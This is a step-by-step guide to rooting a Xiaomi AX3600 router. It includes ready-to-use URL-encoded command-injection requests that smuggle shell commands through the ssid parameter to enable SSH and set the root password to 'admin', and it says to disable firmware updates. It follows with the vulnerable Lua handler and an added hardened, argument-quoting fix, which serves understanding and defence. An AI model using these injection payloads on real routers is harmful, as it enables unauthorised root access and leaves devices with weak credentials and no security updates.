Enabling SSH on the Xiaomi AX3600 router with stock firmware

1. Download the firmware

AX3600

2. Log in to the admin page

http://192.168.31.1/cgi-bin/luci/;stok=<STOK>/web/home#router

3. Enable SSH (replace <STOK> with your token)

http://192.168.31.1/cgi-bin/luci/;stok=<STOK>/api/misystem/set_config_iotdev?bssid=Xiaomi&user_id=longdike&ssid=-h%3B%20nvram%20set%20ssh_en%3D1%3B%20nvram%20commit%3B%20sed%20-i%20's%2Fchannel%3D.*%2Fchannel%3D%5C%22debug%5C%22%2Fg'%20%2Fetc%2Finit.d%2Fdropbear%3B%20%2Fetc%2Finit.d%2Fdropbear%20start%3B

4. Change the root account password to admin

http://192.168.31.1/cgi-bin/luci/;stok=<STOK>/api/misystem/set_config_iotdev?bssid=Xiaomi&user_id=longdike&ssid=-h%3B%20echo%20-e%20'admin%5Cnadmin'%20%7C%20passwd%20root%3B

5. Disable router firmware updates; otherwise an automatic update will undo these changes

How enabling SSH works

function setConfigIotDev()
    local XQFunction = require("xiaoqiang.common.XQFunction")
    local LuciUtil = require("luci.util")
    local result = {
        ["code"] = 0
    }
    local ssid = LuciHttp.formvalue("ssid")      -- parameter used directly, unfiltered
    local bssid = LuciHttp.formvalue("bssid")    -- parameter used directly, unfiltered
    local uid = LuciHttp.formvalue("user_id")    -- parameter used directly, unfiltered
    XQLog.log(debug_level, "ssid = "..ssid)
    XQLog.log(debug_level, "bssid = "..bssid)
    XQLog.log(debug_level, "uid = "..uid)
    if XQFunction.isStrNil(ssid)
        or XQFunction.isStrNil(bssid)
        or XQFunction.isStrNil(uid) then
        result.code = 1523
    end
    if result.code ~= 0 then
        result["msg"] = XQErrorUtil.getErrorMessage(result.code)
    else
        XQFunction.forkExec("connect -s "..ssid.." -b "..bssid.. " -u "..uid) -- parameters concatenated into the shell command, unfiltered
    end
    LuciHttp.write_json(result)
end
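
A hardened variant of the argument handling, as an added example (not Xiaomi's code and not from the original post): each value is validated and then single-quoted before it reaches the shell, so metacharacters in ssid, bssid or user_id stay literal. The helper names, the MAC-address format for bssid and the alphanumeric format for user_id are assumptions.

```lua
-- Added example. shellQuote, validIotArgs and buildConnectCmd are
-- hypothetical helpers, not part of the vendor firmware.

-- Wrap a value in single quotes so /bin/sh treats it as one literal word.
-- An embedded ' becomes '\'' (close quote, escaped quote, reopen quote).
local function shellQuote(s)
    return "'" .. string.gsub(s, "'", "'\\''") .. "'"
end

-- Allowlist checks. The accepted formats are assumptions:
--   ssid:  1..32 bytes, no control characters
--   bssid: MAC address, aa:bb:cc:dd:ee:ff
--   uid:   1..64 characters from [A-Za-z0-9_]
local function validIotArgs(ssid, bssid, uid)
    if type(ssid) ~= "string" or #ssid < 1 or #ssid > 32 then return false end
    if ssid:find("%c") then return false end
    if type(bssid) ~= "string"
        or not bssid:match("^%x%x:%x%x:%x%x:%x%x:%x%x:%x%x$") then
        return false
    end
    if type(uid) ~= "string" or #uid > 64 or not uid:match("^[%w_]+$") then
        return false
    end
    return true
end

-- Returns the command string to hand to forkExec, or nil when any
-- argument fails validation (the caller would then set an error code).
local function buildConnectCmd(ssid, bssid, uid)
    if not validIotArgs(ssid, bssid, uid) then
        return nil
    end
    return "connect -s " .. shellQuote(ssid)
        .. " -b " .. shellQuote(bssid)
        .. " -u " .. shellQuote(uid)
end

-- Constructed sample inputs, not captured traffic.
local samples = {
    { "HomeNet", "aa:bb:cc:dd:ee:ff", "12345" },
    { "guest'; echo injected", "aa:bb:cc:dd:ee:ff", "12345" }, -- quoted, stays literal
    { "HomeNet", "Xiaomi; echo injected", "12345" },           -- bssid rejected
}
for _, s in ipairs(samples) do
    print(buildConnectCmd(s[1], s[2], s[3]) or "rejected")
end
```

Quoting removes the shell injection but does not stop a value that begins with "-" from being read as an option by the connect binary, which is why bssid and user_id are also restricted by pattern.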